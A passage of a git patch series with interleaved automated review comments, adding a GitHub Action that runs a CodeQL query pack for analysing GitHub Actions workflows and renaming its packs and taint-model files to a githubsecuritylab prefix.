"sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "requires": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": 
"sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "requires": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "requires": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "requires": { + "undici-types": "~5.26.4" + } + }, + "@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true + }, + "before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "requires": { + "whatwg-url": "^5.0.0" + } + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } + }, + "prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true + }, + "semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + }, + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" + }, + "typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true + }, + "undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "requires": { + "@fastify/busboy": "^2.0.0" + } + }, + "undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": 
"sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" + }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + } +} diff --git a/.github/action/package.json b/.github/action/package.json new file mode 100644 index 000000000000..90512a3163ca --- /dev/null +++ b/.github/action/package.json 
@@ -0,0 +1,48 @@
+{
+ "name": "codeql-actions-action",
+ "version": "0.1.0",
+ "description": "CodeQL Pack to analyze GitHub Actions and Workflows",
+ "main": "dist/index.js",
+ "scripts": {
+ "bundle": "npm run format:write && npm run package",
+ "cli": "ts-node src/index.ts",
+ "ci-test": "jest",
+ "format:write": "prettier --write **/*.ts",
+ "format:check": "prettier --check **/*.ts",
+ "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml",
+ "package": "ncc build src/index.ts --license licenses.txt",
+ "package:watch": "npm run package -- --watch",
+ "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg",
+ "all": "npm run format:write && npm run lint && npm run test && npm run package"
+ },
+ "repository": {
+ "type": "git",
+ "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git"
+ },
+ "exports": {
+ ".": "./dist/index.js"
+ },
+ "keywords": [
+ "codeql",
+ "security",
+ "actions"
+ ],
+ "author": "Pwntester",
+ "license": "MIT",
+ "bugs": {
+ "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues"
+ },
+ "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme",
+ "dependencies": {
+ "@actions/core": "^1.10.1",
+ "@actions/exec": "^1.1.1",
+ "@actions/github": "^5.1.1",
+ "@actions/tool-cache": "^2.0.1"
+ },
+ "devDependencies": {
+ "@types/node": "^20.6.0",
+ "@vercel/ncc": "^0.38.0",
+ "prettier": "^3.0.3",
+ "typescript": "^5.2.2"
+ }
+}
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
new file mode 100644
index 000000000000..eeeef401a528
--- /dev/null
+++ b/.github/action/src/codeql.ts
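Review bot: The `lint`, `cli`, `ci-test` and `test` scripts invoke `eslint` (through `npx`), `ts-node`, `jest` and `make-coverage-badge`, none of which is listed in `devDependencies`, so `npx eslint …` resolves to whatever the registry serves at run time rather than a locked, integrity-checked version from `package-lock.json`. Either add the tools that are actually used to `devDependencies` so they are pinned by the lockfile, or drop the scripts that reference them until they are. The `format:write`/`format:check` globs are unquoted, so the shell expands `**/*.ts` before prettier sees it (in a shell without globstar that is only one directory deep); quoting it, `"format:write": "prettier --write \"**/*.ts\""`, lets prettier do the recursive match itself.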
@@ -0,0 +1,158 @@
+import * as fs from "fs";
+import * as path from "path";
+
+import * as core from "@actions/core";
+import * as toolcache from "@actions/tool-cache";
+import * as github from "@actions/github";
+import * as toolrunner from "@actions/exec/lib/toolrunner";
+
+export interface CodeQLConfig {
+ // The path to the codeql bundle.
+ path: string;
+ // The language to use for analysis.
+ language: string;
+ // CodeQL pack to use for analysis.
+ pack: string;
+ // The codeql suite to use for analysis.
+ suite: string;
+ // The source root to use for analysis.
+ source_root?: string;
+ // The output file for the SARIF file.
+ output?: string;
+}
+
+export async function newCodeQL(): Promise {
+ return {
+ language: "yaml",
+ path: await findCodeQL(),
+ pack: "GitHubSecurityLab/actions-queries",
+ suite: "codeql-suites/actions-code-scanning.qls",
+ source_root: core.getInput("source-root"),
+ output: core.getInput("sarif"),
+ };
+}
+
+export async function runCommand(
+ config: CodeQLConfig,
+ args: string[],
+): Promise {
+ var bin = path.join(config.path, "codeql");
+ let output = "";
+ var options = {
+ listeners: {
+ stdout: (data: Buffer) => {
+ output += data.toString();
+ },
+ },
+ };
+
+ await new toolrunner.ToolRunner(bin, args, options).exec();
+ core.debug(`Finished running command :: ${bin} ${args.join(" ")}`);
+
+ return output.trim();
+}
+
+export async function runCommandJson(
+ config: CodeQLConfig,
+ args: string[],
+): Promise {
+ return JSON.parse(await runCommand(config, args));
+}
+async function findCodeQL(): Promise {
+ // check if codeql is in the toolcache
+ var codeqlPath = await findCodeQlInToolcache();
+ if (codeqlPath !== undefined) {
+ return codeqlPath;
+ }
+ // default to the codeql in the path
+ return "codeql";
+}
+
+async function findCodeQlInToolcache(): Promise {
+ const candidates = toolcache
+ .findAllVersions("CodeQL")
+ .map((version) => ({
+ folder: toolcache.find("CodeQL", version),
+ version,
+ }))
+ .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version")));
+
+ if (candidates.length === 1) {
+ const candidate = candidates[0];
+ core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`);
+ core.debug(`CodeQL toolcache version: '${candidate.version}'.`);
+
+ return path.join(candidate.folder, "codeql");
+ }
+
+ core.warning(`No CodeQL tools found in toolcache.`);
+
+ return undefined;
+}
+
+export async function downloadPack(codeql: CodeQLConfig): Promise {
+ try {
+ await runCommand(codeql, ["pack", "download", codeql.pack]);
+ return true;
+ } catch (error) {
+ core.warning("Failed to download pack from GitHub...");
+ }
+ return false;
+}
+
+export async function codeqlDatabaseCreate(
+ codeql: CodeQLConfig,
+): Promise {
+ // get runner temp directory for database
+ var temp = process.env["RUNNER_TEMP"];
+ if (temp === undefined) {
+ temp = "/tmp";
+ }
+ var database_path = path.join(temp, "codeql-actions-db");
+ var source_root =
+ codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./";
+
+ await runCommand(codeql, [
+ "database",
+ "create",
+ "--language",
+ codeql.language,
+ "--source-root",
+ source_root,
+ database_path,
+ ]);
+
+ return database_path;
+}
+
+export async function codeqlDatabaseAnalyze(
+ codeql: CodeQLConfig,
+ database_path: string,
+): Promise {
+ var codeql_output = codeql.output || "codeql-actions.sarif";
+
+ var cmd = [
+ "database",
+ "analyze",
+ "--format",
+ "sarif-latest",
+ "--sarif-add-query-help",
+ "--output",
+ codeql_output,
+ ];
+
+ // remote pack or local pack
+ if (codeql.pack.startsWith("GitHubSecurityLab/")) {
+ var suite = codeql.pack + ":" + codeql.suite;
+ } else {
+ // assume path
+ var suite = path.join(codeql.pack, codeql.suite);
+ cmd.push("--search-path", codeql.pack);
+ }
+
+ cmd.push(database_path, suite);
+
+ await runCommand(codeql, cmd);
+
+ return codeql_output;
+}
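Review bot: The PATH fallback in `findCodeQL` does not do what its comment says: it returns the bare string `"codeql"` as the bundle *directory*, and `runCommand` then builds `path.join(config.path, "codeql")`, i.e. the relative path `codeql/codeql`, which as far as I can tell `@actions/exec`'s ToolRunner resolves against the working directory (a tool path containing a separator is never searched on PATH). Make the fallback return an empty directory and skip the join when it is empty, `const bin = config.path ? path.join(config.path, "codeql") : "codeql";`, or have `findCodeQL` resolve the binary with `io.which("codeql", true)` and keep only its directory. Separately, `downloadPack` runs `codeql pack download` with no version suffix on `codeql.pack`, so each run pulls whatever the registry currently publishes as the latest pack; pinning it (`name@x.y.z`) would make the query set used for a given run reproducible. Minor: because only `candidates.length === 1` is accepted, two cached CodeQL versions yield the misleading warning `No CodeQL tools found in toolcache.` rather than, say, the newest.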
diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts
new file mode 100644
index 000000000000..b1a4fc80c644
--- /dev/null
+++ b/.github/action/src/index.ts
@@ -0,0 +1,61 @@
+import * as path from "path";
+import * as core from "@actions/core";
+import * as cql from "./codeql";
+
+/**
+ * The main function for the action.
+ * @returns {Promise} Resolves when the action is complete.
+ */
+export async function run(): Promise {
+ try {
+ // set up codeql
+ var codeql = await cql.newCodeQL();
+
+ core.debug(`CodeQL CLI found at '${codeql.path}'`);
+
+ await cql.runCommand(codeql, ["version", "--format", "terse"]);
+
+ // check yaml support
+ var languages = await cql.runCommandJson(codeql, [
+ "resolve",
+ "languages",
+ "--format",
+ "json",
+ ]);
+
+ if (!languages.hasOwnProperty("yaml")) {
+ core.setFailed("CodeQL Yaml extractor not installed");
+ throw new Error("CodeQL Yaml extractor not installed");
+ }
+
+ // download pack
+ core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`);
+ var pack_downloaded = await cql.downloadPack(codeql);
+
+ if (pack_downloaded === false) {
+ var action_path = path.resolve(path.join(__dirname, "..", "..", ".."));
+ codeql.pack = path.join(action_path, "ql", "src");
+
+ core.info(`Pack defaulting back to local pack: '${codeql.pack}'`);
+ } else {
+ core.info(`Pack downloaded '${codeql.pack}'`);
+ }
+
+ core.info("Creating CodeQL database...");
+ var database_path = await cql.codeqlDatabaseCreate(codeql);
+
+ core.info("Running CodeQL analysis...");
+ var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path);
+
+ core.info(`SARIF results: '${sarif}'`);
+ core.setOutput("sarif", sarif);
+
+ core.info("Finished CodeQL analysis");
+ } catch (error) {
+ // Fail the workflow run if an error occurs
+ if (error instanceof Error) core.setFailed(error.message);
+ }
+}
+
+// eslint-disable-next-line @typescript-eslint/no-floating-promises
+run();
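Review bot: The `catch` at the bottom of `run` only calls `core.setFailed` when the rejection is an `Error` instance; any other thrown value is swallowed and the step exits 0, so a failed analysis could let the workflow pass green. Add the other branch, `if (error instanceof Error) core.setFailed(error.message); else core.setFailed(String(error));`. The yaml-extractor check also calls `core.setFailed` and then throws the same message, so the catch block marks the run failed a second time; the `throw` alone is enough there. A short comment on the `pack_downloaded === false` branch would help too, e.g. `// Network/registry failure: fall back to the pack bundled in this repository (ql/src) so the analysis still runs, with a different query set.`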
diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json
new file mode 100644
index 000000000000..c4b7762f9cd2
--- /dev/null
+++ b/.github/action/tsconfig.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://json.schemastore.org/tsconfig",
+ "compilerOptions": {
+ "target": "ES2022",
+ "module": "NodeNext",
+ "rootDir": "./src",
+ "moduleResolution": "NodeNext",
+ "baseUrl": "./",
+ "sourceMap": true,
+ "outDir": "./dist",
+ "noImplicitAny": true,
+ "esModuleInterop": true,
+ "forceConsistentCasingInFileNames": true,
+ "strict": true,
+ "skipLibCheck": true,
+ "newLine": "lf"
+ },
+ "exclude": [
+ "./dist",
+ "./node_modules",
+ "./__tests__",
+ "./coverage"
+ ]
+}
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
new file mode 100644
index 000000000000..7380ae46d07c
--- /dev/null
+++ b/.github/workflows/build.yml
@@ -0,0 +1,30 @@
+name: Build and Compile Action
+
+on:
+ pull_request:
+ branches: ["master", "develop"]
+ workflow_dispatch:
+
+permissions:
+ contents: read
+ packages: read
+ pull-requests: read
+
+jobs:
+ action:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50
+ id: changes
+ with:
+ filters: |
+ src:
+ - '.github/action/**'
+ - 'action.yml'
+
+ - name: Run action
+ if: steps.changes.outputs.src == 'true'
+ uses: ./
+ with:
+ extractor-version: latest
diff --git a/action.yml b/action.yml
new file mode 100644
index 000000000000..03054c195be9
--- /dev/null
+++ b/action.yml
@@ -0,0 +1,19 @@
+name: "codeql-actions"
+description: "CodeQL Pack for GitHub Actions and Workflows"
+
+inputs:
+ token:
+ description: GitHub Token
+ default: ${{ github.token }}
+
+ source-root:
+ description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE."
+ default: "./"
+
+ sarif:
+ description: "SARIF File Output"
+ default: "codeql-actions.sarif"
+
+runs:
+ using: "node16"
+ main: ".github/action/dist/index.js"
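Review bot: The `Run action` step passes `extractor-version: latest` to `uses: ./`, but the `action.yml` added in this same commit declares only `token`, `source-root` and `sarif`, so the runner will warn about an unexpected input and the value is never read; either declare it or drop the `with:` block. Pinning is also inconsistent: `dorny/paths-filter` is pinned to a commit SHA while `actions/checkout@v4` follows a mutable tag, so the workflow's supply-chain posture is only as strong as the weaker of the two — pin checkout by SHA as well. Consider a `# pinned to vX.Y.Z` comment next to each SHA so Dependabot/humans can tell what version it is.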
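Review bot: The `token` input is declared with `default: ${{ github.token }}`, but nothing in `src/index.ts` or `src/codeql.ts` in this commit calls `core.getInput("token")`, so a credential is accepted and documented that the action never uses; remove it until it is wired in (for example to authenticate `codeql pack download`) so users do not assume the analysis runs with the token they pass. `using: "node16"` should be noted as a follow-up: GitHub has deprecated the Node 16 action runtime in favour of `node20`, and the `@types/node` ^20 devDependency in `package.json` already targets Node 20. A one-line comment above `runs:` recording why node16 was chosen, or the planned upgrade, would help: `# TODO: move to node20 once the runtime is verified on self-hosted runners`.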
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8cf5ba69354f..dc4daebaac84 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: codeql/actions-all +name: GitHubSecurityLab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f4c43168664a..919a244b3905 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: codeql/actions-queries +name: GitHubSecurityLab/actions-queries version: 0.0.1 groups: - actions From cf4ab41df2eeb5131a64ec2faadf4832dbfb7635 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:32:48 +0100 Subject: [PATCH 038/707] feat(action): rename qlpacks to use githubsecuritylab prefix --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/qlpack.yml | 2 +- .../codeql-suites/actions-code-scanning.qls | 19 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 5 files changed, 23 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e13da63ecdad..23c035881624 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index eeeef401a528..3826737a0824 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc4daebaac84..1ccfae0b2781 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: GitHubSecurityLab/actions-all +name: githubsecuritylab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index e69de29bb2d1..7d6c94e0c8c8 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -0,0 +1,19 @@ +- description: Standard Code Scanning queries for Actions +- queries: . + +- include: + kind: + - problem + - path-problem + tags contain: + - security + - maintainability + +- include: + kind: + - diagnostic + +- exclude: + tags contain: + - experimental + - testing diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 919a244b3905..fb5d29fb9577 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: GitHubSecurityLab/actions-queries +name: githubsecuritylab/actions-queries version: 0.0.1 groups: - actions From 5d1264d3a4beef372fa972e068a95b9393429a6d Mon Sep 17 00:00:00 2001 
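Review bot: Renaming the pack to `githubsecuritylab/actions-queries` here leaves the `codeql.pack.startsWith("GitHubSecurityLab/")` check in `codeqlDatabaseAnalyze` (outside this hunk, same file) matching the old casing, so after this change the remote pack name takes the "assume path" branch: the suite becomes `path.join(codeql.pack, codeql.suite)` and `--search-path githubsecuritylab/actions-queries` is pushed as a relative directory that does not exist. Update that prefix to the new casing in the same commit, or better, decide by whether the pack is a local directory, `if (!fs.existsSync(codeql.pack)) { var suite = codeql.pack + ":" + codeql.suite; }`, so the two constants cannot drift apart again. `newCodeQL` starts outside the hunk.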
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:56:06 +0100 Subject: [PATCH 039/707] feat(action): update references to qlpacks --- .gitignore | 2 ++ ql/lib/ext/PLACEHOLDER.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 4 ++-- ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/tj-actions_changed-files.model.yml | 4 ++-- ql/lib/ext/tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 11 files changed, 14 insertions(+), 12 deletions(-) diff --git a/.gitignore b/.gitignore index 1233930f4a4f..e147f87bf723 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ .DS_Store **/*.testproj +ql/lib/.codeql/ +ql/src/.codeql/ diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml index ef916067967d..2f549573a533 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sinkModel data: - ["","","",""] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 3308967eebc1..8f449f6b26db 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index d2b2ed48fc5f..6ee41e93826c 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 79fd5c76e4ae..760b7cd46e72 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index bc7344eedca6..f19a2da37f5e 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] @@ -16,4 +16,4 @@ extensions: - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 332527813a41..bddfb8e67fa7 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml 
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index b3b8baed7fc0..fc5557db6ea9 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] @@ -36,4 +36,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 408abfbb8d0c..76d83bd249e1 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1ccfae0b2781..3c344549245a 100644 --- a/ql/lib/qlpack.yml +++ 